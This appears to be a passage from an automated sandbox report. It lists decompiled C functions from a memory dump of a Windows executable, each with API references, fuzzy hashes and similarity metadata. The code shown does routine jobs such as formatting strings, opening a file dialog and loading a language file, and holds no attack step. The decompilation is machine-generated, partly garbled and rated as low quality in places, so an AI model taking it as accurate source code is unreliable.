                                                                                                                                                                                                                          0x00405189
                                                                                                                                                                                                                          0x0040518c
                                                                                                                                                                                                                          0x00405194
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00405196
                                                                                                                                                                                                                          0x0040519a
                                                                                                                                                                                                                          0x0040519b
                                                                                                                                                                                                                          0x004051a1
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x004051a1
                                                                                                                                                                                                                          0x004051a3
                                                                                                                                                                                                                          0x004051a3
                                                                                                                                                                                                                          0x004051a6
                                                                                                                                                                                                                          0x004051af
                                                                                                                                                                                                                          0x004051b0
                                                                                                                                                                                                                          0x004051b7

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _snwprintfmemcpy
                                                                                                                                                                                                                          • String ID: %2.2X
                                                                                                                                                                                                                          • API String ID: 2789212964-323797159
                                                                                                                                                                                                                          • Opcode ID: 66b7574eb9a61f89bba5daddfea12679ea202a088e21b7349ae655d3273dc8be
                                                                                                                                                                                                                          • Instruction ID: b76e4bbe2d26c53343c630e3245d096d82678977124e835a89109146ed91de65
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 66b7574eb9a61f89bba5daddfea12679ea202a088e21b7349ae655d3273dc8be
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5A11A532900608BFEB01DFE8C882AAF77B9FB45314F104477ED14EB141D6789A058BD5
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 004075BB, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 43%
                                                                                                                                                                                                                          			E004075BB(void* __ebx, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
				char _v44;
				intOrPtr _t22;
				signed int _t30;
				signed int _t34;
				void* _t35;
				void* _t36;

				_t35 = __esi;
				_t34 = 0;
				if( *((intOrPtr*)(__esi + 0x2c)) > 0) {
					do {
						_t30 =  *( *((intOrPtr*)(__esi + 0x30)) + _t34 * 4);
						_t22 =  *((intOrPtr*)(_t30 * 0x14 +  *((intOrPtr*)(__esi + 0x40)) + 0xc));
						L0040B1EC();
						_push( *((intOrPtr*)( *_a8))(_t30,  *((intOrPtr*)(__esi + 0x64)),  &_v44, 0x14, L"%%-%d.%ds ", _t22, _t22));
						_push( &_v44);
						_push(0x2000);
						_push( *((intOrPtr*)(__esi + 0x60)));
						L0040B1EC();
						_t36 = _t36 + 0x24;
						E00407343(__esi, _a4,  *((intOrPtr*)(__esi + 0x60)));
						_t34 = _t34 + 1;
					} while (_t34 <  *((intOrPtr*)(__esi + 0x2c)));
				}
				return E00407343(_t35, _a4, L"\r\n");
			}









                                                                                                                                                                                                                          0x004075bb
                                                                                                                                                                                                                          0x004075c2
                                                                                                                                                                                                                          0x004075c7
                                                                                                                                                                                                                          0x004075ca
                                                                                                                                                                                                                          0x004075cd
                                                                                                                                                                                                                          0x004075d8
                                                                                                                                                                                                                          0x004075e9
                                                                                                                                                                                                                          0x004075fc
                                                                                                                                                                                                                          0x00407600
                                                                                                                                                                                                                          0x00407601
                                                                                                                                                                                                                          0x00407606
                                                                                                                                                                                                                          0x00407609
                                                                                                                                                                                                                          0x0040760e
                                                                                                                                                                                                                          0x00407619
                                                                                                                                                                                                                          0x0040761e
                                                                                                                                                                                                                          0x0040761f
                                                                                                                                                                                                                          0x00407624
                                                                                                                                                                                                                          0x00407636

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _snwprintf
                                                                                                                                                                                                                          • String ID: %%-%d.%ds
                                                                                                                                                                                                                          • API String ID: 3988819677-2008345750
                                                                                                                                                                                                                          • Opcode ID: 8b20a529ff37d77b79effa085cf49c3b2d19e50ebfb67170c6dd6cfdd11deb7b
                                                                                                                                                                                                                          • Instruction ID: ecb877ded915dbad8d5af0e436ed4e240226c92ce5a1c47ab2288d53f8dcf9da
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8b20a529ff37d77b79effa085cf49c3b2d19e50ebfb67170c6dd6cfdd11deb7b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BC01B931600704AFD7109F69CC82D5A77ADFF48304B004439FD86B7292D635F911DBA5
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 0040507A, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                          			E0040507A(intOrPtr __eax, wchar_t* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v20;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				wchar_t* _v52;
				intOrPtr _v56;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v76;
				struct tagOFNA _v80;

				_v76 = __eax;
				_v68 = _a4;
				_v64 = 0;
				_v44 = 0;
				_v36 = 0;
				_v32 = _a8;
				_v20 = _a12;
				_v80 = 0x4c;
				_v56 = 1;
				_v52 = __esi;
				_v48 = 0x104;
				_v28 = 0x81804;
				if(GetOpenFileNameW( &_v80) == 0) {
					return 0;
				} else {
					wcscpy(__esi, _v52);
					return 1;
				}
			}















                                                                                                                                                                                                                          0x00405080
                                                                                                                                                                                                                          0x00405086
                                                                                                                                                                                                                          0x0040508b
                                                                                                                                                                                                                          0x0040508e
                                                                                                                                                                                                                          0x00405091
                                                                                                                                                                                                                          0x00405097
                                                                                                                                                                                                                          0x0040509d
                                                                                                                                                                                                                          0x004050a4
                                                                                                                                                                                                                          0x004050ab
                                                                                                                                                                                                                          0x004050b2
                                                                                                                                                                                                                          0x004050b5
                                                                                                                                                                                                                          0x004050bc
                                                                                                                                                                                                                          0x004050cb
                                                                                                                                                                                                                          0x004050e0
                                                                                                                                                                                                                          0x004050cd
                                                                                                                                                                                                                          0x004050d1
                                                                                                                                                                                                                          0x004050dc
                                                                                                                                                                                                                          0x004050dc

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FileNameOpenwcscpy
                                                                                                                                                                                                                          • String ID: L
                                                                                                                                                                                                                          • API String ID: 3246554996-2909332022
                                                                                                                                                                                                                          • Opcode ID: a51a7b57d6ecd1b98ae1f97c69f64cb7c1c2e9715c85319fb07a92e86122e8f3
                                                                                                                                                                                                                          • Instruction ID: bc55e530e402ba4b599a228f817f204aa1fc4279979982f23bca087f07049b97
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a51a7b57d6ecd1b98ae1f97c69f64cb7c1c2e9715c85319fb07a92e86122e8f3
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9A015FB1D102199FDF40DFA9D885ADEBBF4BB08304F14812AE915F6240E77495458F98
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 0040906D, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28libraryloaderCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 58%
                                                                                                                                                                                                                          			E0040906D(struct HINSTANCE__** __eax, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				void* __esi;
				_Unknown_base(*)()* _t10;
				void* _t12;
				struct HINSTANCE__** _t13;

				_t13 = __eax;
				_t12 = 0;
				if(E00408F72(__eax) != 0) {
					_t10 = GetProcAddress( *_t13, "LookupAccountSidW");
					if(_t10 != 0) {
						_t12 =  *_t10(0, _a4, _a8, _a12, _a16, _a20, _a24);
					}
				}
				return _t12;
			}







                                                                                                                                                                                                                          0x00409072
                                                                                                                                                                                                                          0x00409074
                                                                                                                                                                                                                          0x0040907d
                                                                                                                                                                                                                          0x00409086
                                                                                                                                                                                                                          0x0040908e
                                                                                                                                                                                                                          0x004090a5
                                                                                                                                                                                                                          0x004090a5
                                                                                                                                                                                                                          0x0040908e
                                                                                                                                                                                                                          0x004090ac

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,LookupAccountSidW), ref: 00409086
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressProc
                                                                                                                                                                                                                          • String ID: LookupAccountSidW$Y@
                                                                                                                                                                                                                          • API String ID: 190572456-2352570548
                                                                                                                                                                                                                          • Opcode ID: ef5ceafcaa1143e80c32773d35785430279aa9a6fc3cb1ecefeef801cdbe6fb2
                                                                                                                                                                                                                          • Instruction ID: 3ebfd29b958db2e29df2983e37ea976ab6b1d16e8490ad6d4f073a9de280f7a1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ef5ceafcaa1143e80c32773d35785430279aa9a6fc3cb1ecefeef801cdbe6fb2
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F5E0E537100109BBDF125E96DD01CAB7AA79F84750B144035FA54E1161D6368821A794
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 0040AD85, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21libraryloaderCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 37%
                                                                                                                                                                                                                          			E0040AD85(intOrPtr _a4) {
				_Unknown_base(*)()* _t3;
				void* _t7;
				struct HINSTANCE__* _t8;
				char** _t9;

				_t7 = 0;
				_t8 = E00405436(L"shlwapi.dll");
				 *_t9 = "SHAutoComplete";
				_t3 = GetProcAddress(_t8, ??);
				if(_t3 != 0) {
					_t7 =  *_t3(_a4, 0x10000001);
				}
				FreeLibrary(_t8);
				return _t7;
			}







                                                                                                                                                                                                                          0x0040ad8c
                                                                                                                                                                                                                          0x0040ad93
                                                                                                                                                                                                                          0x0040ad95
                                                                                                                                                                                                                          0x0040ad9d
                                                                                                                                                                                                                          0x0040ada5
                                                                                                                                                                                                                          0x0040adb2
                                                                                                                                                                                                                          0x0040adb2
                                                                                                                                                                                                                          0x0040adb5
                                                                                                                                                                                                                          0x0040adbf

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                                                                                                                                                                            • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                                                                                                                                                                            • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                                                                                                                                                            • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 0040AD9D
                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,00403CB8,00000000), ref: 0040ADB5
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Library$Load$AddressFreeProcmemsetwcscat
                                                                                                                                                                                                                          • String ID: shlwapi.dll
                                                                                                                                                                                                                          • API String ID: 4092907564-3792422438
                                                                                                                                                                                                                          • Opcode ID: 60c0f151f26cb5c38cd65ac108f35652f4abbc6483df8549b5860e56d1e4938b
                                                                                                                                                                                                                          • Instruction ID: 3ba04cc2888c968bb17b12a51753cff707eeab9003a5d350ca2caef87bad7666
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 60c0f151f26cb5c38cd65ac108f35652f4abbc6483df8549b5860e56d1e4938b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E1D01235211111EBD7616B66AD44A9F7AA6DFC1351B060036F544F2191DB3C4846C669
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 00406597, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                          			E00406597(wchar_t* __esi) {
				wchar_t* _t2;
				wchar_t* _t6;

				_t6 = __esi;
				E00404AD9(__esi);
				_t2 = wcsrchr(__esi, 0x2e);
				if(_t2 != 0) {
					 *_t2 =  *_t2 & 0x00000000;
				}
				return wcscat(_t6, L"_lng.ini");
			}





                                                                                                                                                                                                                          0x00406597
                                                                                                                                                                                                                          0x00406598
                                                                                                                                                                                                                          0x004065a0
                                                                                                                                                                                                                          0x004065aa
                                                                                                                                                                                                                          0x004065ac
                                                                                                                                                                                                                          0x004065ac
                                                                                                                                                                                                                          0x004065bd

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                                                                                                                                                          • wcsrchr.MSVCRT ref: 004065A0
                                                                                                                                                                                                                          • wcscat.MSVCRT ref: 004065B6
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FileModuleNamewcscatwcsrchr
                                                                                                                                                                                                                          • String ID: _lng.ini
                                                                                                                                                                                                                          • API String ID: 383090722-1948609170
                                                                                                                                                                                                                          • Opcode ID: 3432a58373c8f6497560b18ec501466e1d989437fee4d639b0ed4d8698fe302d
                                                                                                                                                                                                                          • Instruction ID: e4456dc4ef972d75cd366ed24565615e7e819105f92635e6590d4ece6e8d8120
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3432a58373c8f6497560b18ec501466e1d989437fee4d639b0ed4d8698fe302d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 16C01292682620A4E2223322AC03B4F1248CF62324F21407BF906381C7EFBD826180EE
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 0040AC52, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 13libraryloaderCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                          			E0040AC52() {
				struct HINSTANCE__* _t1;
				_Unknown_base(*)()* _t2;

				if( *0x4101c4 == 0) {
					_t1 = E00405436(L"shell32.dll");
					 *0x4101c4 = _t1;
					if(_t1 != 0) {
						_t2 = GetProcAddress(_t1, "SHGetSpecialFolderPathW");
						 *0x4101c0 = _t2;
						return _t2;
					}
				}
				return _t1;
			}





                                                                                                                                                                                                                          0x0040ac59
                                                                                                                                                                                                                          0x0040ac60
                                                                                                                                                                                                                          0x0040ac68
                                                                                                                                                                                                                          0x0040ac6d
                                                                                                                                                                                                                          0x0040ac75
                                                                                                                                                                                                                          0x0040ac7b
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x0040ac7b
                                                                                                                                                                                                                          0x0040ac6d
                                                                                                                                                                                                                          0x0040ac80

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                                                                                                                                                                            • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                                                                                                                                                                            • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                                                                                                                                                            • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 0040AC75
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: LibraryLoad$AddressProcmemsetwcscat
                                                                                                                                                                                                                          • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                                                                                                                                                                                          • API String ID: 946536540-880857682
                                                                                                                                                                                                                          • Opcode ID: c6b2f9cbd74a5c44be84662768ba9687afe1719f9bd5d931826811f56c49482b
                                                                                                                                                                                                                          • Instruction ID: 297d67d15b42b64e279660486abf15c243c4c6a8dcafd005a32ae5f28444c9d4
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c6b2f9cbd74a5c44be84662768ba9687afe1719f9bd5d931826811f56c49482b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9AD0C9B0D8A301ABE7106BB0AF05B523AA4B704301F12417BF800B12E0DBBE90888A1E
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 00406670, Relevance: 5.1, APIs: 4, Instructions: 73COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 90%
                                                                                                                                                                                                                          			E00406670(char** __esi, void* __eflags) {
				char* _t30;
				char** _t39;

				_t39 = __esi;
				 *__esi = "cf@";
				__esi[0xb8] = 0;
				_t30 = E00404FA4(0x338, __esi);
				_push(0x14);
				__esi[0xcb] = 0;
				__esi[0xa6] = 0;
				__esi[0xb9] = 0;
				__esi[0xba] = 0xfff;
				__esi[8] = 0;
				__esi[1] = 0;
				__esi[0xb7] = 1;
				L0040B26C();
				if(_t30 == 0) {
					_t30 = 0;
				} else {
					_t30[4] = 0;
					_t30[0x10] = 0;
					_t30[8] = 0;
					_t30[0xc] = 0x100;
					 *_t30 = 0;
				}
				_push(0x14);
				_t39[2] = _t30;
				L0040B26C();
				if(_t30 == 0) {
					_t30 = 0;
				} else {
					_t30[4] = 0;
					_t30[0x10] = 0;
					_t30[8] = 0;
					_t30[0xc] = 0x100;
					 *_t30 = 0;
				}
				_push(0x14);
				_t39[3] = _t30;
				L0040B26C();
				if(_t30 == 0) {
					_t30 = 0;
				} else {
					_t30[4] = 0;
					_t30[0x10] = 0;
					_t30[8] = 0;
					_t30[0xc] = 0x100;
					 *_t30 = 0;
				}
				_push(0x14);
				_t39[4] = _t30;
				L0040B26C();
				if(_t30 == 0) {
					_t30 = 0;
				} else {
					_t30[4] = 0;
					_t30[0x10] = 0;
					_t30[8] = 0;
					_t30[0xc] = 0x100;
					 *_t30 = 0;
				}
				_t39[5] = _t30;
				return _t39;
			}





                                                                                                                                                                                                                          0x00406670
                                                                                                                                                                                                                          0x0040667a
                                                                                                                                                                                                                          0x00406680
                                                                                                                                                                                                                          0x00406686
                                                                                                                                                                                                                          0x0040668b
                                                                                                                                                                                                                          0x0040668d
                                                                                                                                                                                                                          0x00406693
                                                                                                                                                                                                                          0x00406699
                                                                                                                                                                                                                          0x0040669f
                                                                                                                                                                                                                          0x004066a9
                                                                                                                                                                                                                          0x004066ac
                                                                                                                                                                                                                          0x004066af
                                                                                                                                                                                                                          0x004066b9
                                                                                                                                                                                                                          0x004066c7
                                                                                                                                                                                                                          0x004066d9
                                                                                                                                                                                                                          0x004066c9
                                                                                                                                                                                                                          0x004066c9
                                                                                                                                                                                                                          0x004066cc
                                                                                                                                                                                                                          0x004066cf
                                                                                                                                                                                                                          0x004066d2
                                                                                                                                                                                                                          0x004066d5
                                                                                                                                                                                                                          0x004066d5
                                                                                                                                                                                                                          0x004066db
                                                                                                                                                                                                                          0x004066dd
                                                                                                                                                                                                                          0x004066e0
                                                                                                                                                                                                                          0x004066e8
                                                                                                                                                                                                                          0x004066fa
                                                                                                                                                                                                                          0x004066ea
                                                                                                                                                                                                                          0x004066ea
                                                                                                                                                                                                                          0x004066ed
                                                                                                                                                                                                                          0x004066f0
                                                                                                                                                                                                                          0x004066f3
                                                                                                                                                                                                                          0x004066f6
                                                                                                                                                                                                                          0x004066f6
                                                                                                                                                                                                                          0x004066fc
                                                                                                                                                                                                                          0x004066fe
                                                                                                                                                                                                                          0x00406701
                                                                                                                                                                                                                          0x00406709
                                                                                                                                                                                                                          0x0040671b
                                                                                                                                                                                                                          0x0040670b
                                                                                                                                                                                                                          0x0040670b
                                                                                                                                                                                                                          0x0040670e
                                                                                                                                                                                                                          0x00406711
                                                                                                                                                                                                                          0x00406714
                                                                                                                                                                                                                          0x00406717
                                                                                                                                                                                                                          0x00406717
                                                                                                                                                                                                                          0x0040671d
                                                                                                                                                                                                                          0x0040671f
                                                                                                                                                                                                                          0x00406722
                                                                                                                                                                                                                          0x0040672a
                                                                                                                                                                                                                          0x0040673c
                                                                                                                                                                                                                          0x0040672c
                                                                                                                                                                                                                          0x0040672c
                                                                                                                                                                                                                          0x0040672f
                                                                                                                                                                                                                          0x00406732
                                                                                                                                                                                                                          0x00406735
                                                                                                                                                                                                                          0x00406738
                                                                                                                                                                                                                          0x00406738
                                                                                                                                                                                                                          0x0040673f
                                                                                                                                                                                                                          0x00406745

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ??2@$memset
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1860491036-0
                                                                                                                                                                                                                          • Opcode ID: e85a19cc904d935af36f35088f158f19d60a259a6de7382aef0aa8ca398aac1e
                                                                                                                                                                                                                          • Instruction ID: f950f85206354bd8a0b3bb5dce35e971dba3beadb745d31d99e8bf3535aee89b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e85a19cc904d935af36f35088f158f19d60a259a6de7382aef0aa8ca398aac1e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F121D4B0A007008FD7219F2AC448956FBE8FF90314B2689BFD15ADB2B1D7B89441DF18
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 004054DF, Relevance: 5.1, APIs: 4, Instructions: 67COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                          			E004054DF(signed int* __eax, void* __ecx, wchar_t* _a4) {
				int _v8;
				signed int _v12;
				void* __edi;
				int _t32;
				intOrPtr _t33;
				intOrPtr _t36;
				signed int _t48;
				signed int _t58;
				signed int _t59;
				void** _t62;
				void** _t63;
				signed int* _t66;

				_t66 = __eax;
				_t32 = wcslen(_a4);
				_t48 =  *(_t66 + 4);
				_t58 = _t48 + _t32;
				_v12 = _t58;
				_t59 = _t58 + 1;
				_v8 = _t32;
				_t33 =  *((intOrPtr*)(_t66 + 0x14));
				 *(_t66 + 4) = _t59;
				_t62 = _t66 + 0x10;
				if(_t59 != 0xffffffff) {
					E00404951(_t66, _t59, _t62, 2, _t33);
				} else {
					free( *_t62);
				}
				_t60 =  *(_t66 + 0x1c);
				_t36 =  *((intOrPtr*)(_t66 + 0x18));
				_t63 = _t66 + 0xc;
				if( *(_t66 + 0x1c) != 0xffffffff) {
					E00404951(_t66 + 8, _t60, _t63, 4, _t36);
				} else {
					free( *_t63);
				}
				memcpy( *(_t66 + 0x10) + _t48 * 2, _a4, _v8 + _v8);
				 *((short*)( *(_t66 + 0x10) + _v12 * 2)) =  *( *(_t66 + 0x10) + _v12 * 2) & 0x00000000;
				 *( *_t63 +  *(_t66 + 0x1c) * 4) = _t48;
				 *(_t66 + 0x1c) =  *(_t66 + 0x1c) + 1;
				_t30 =  *(_t66 + 0x1c) - 1; // -1
				return _t30;
			}















                                                                                                                                                                                                                          0x004054ea
                                                                                                                                                                                                                          0x004054ec
                                                                                                                                                                                                                          0x004054f1
                                                                                                                                                                                                                          0x004054f4
                                                                                                                                                                                                                          0x004054f7
                                                                                                                                                                                                                          0x004054fa
                                                                                                                                                                                                                          0x004054fe
                                                                                                                                                                                                                          0x00405501
                                                                                                                                                                                                                          0x00405505
                                                                                                                                                                                                                          0x00405508
                                                                                                                                                                                                                          0x0040550b
                                                                                                                                                                                                                          0x0040551b
                                                                                                                                                                                                                          0x0040550d
                                                                                                                                                                                                                          0x0040550f
                                                                                                                                                                                                                          0x0040550f
                                                                                                                                                                                                                          0x00405521
                                                                                                                                                                                                                          0x00405527
                                                                                                                                                                                                                          0x0040552b
                                                                                                                                                                                                                          0x0040552e
                                                                                                                                                                                                                          0x0040553f
                                                                                                                                                                                                                          0x00405530
                                                                                                                                                                                                                          0x00405532
                                                                                                                                                                                                                          0x00405532
                                                                                                                                                                                                                          0x00405556
                                                                                                                                                                                                                          0x00405561
                                                                                                                                                                                                                          0x0040556e
                                                                                                                                                                                                                          0x00405571
                                                                                                                                                                                                                          0x00405578
                                                                                                                                                                                                                          0x0040557e

                                                                                                                                                                                                                          APIs
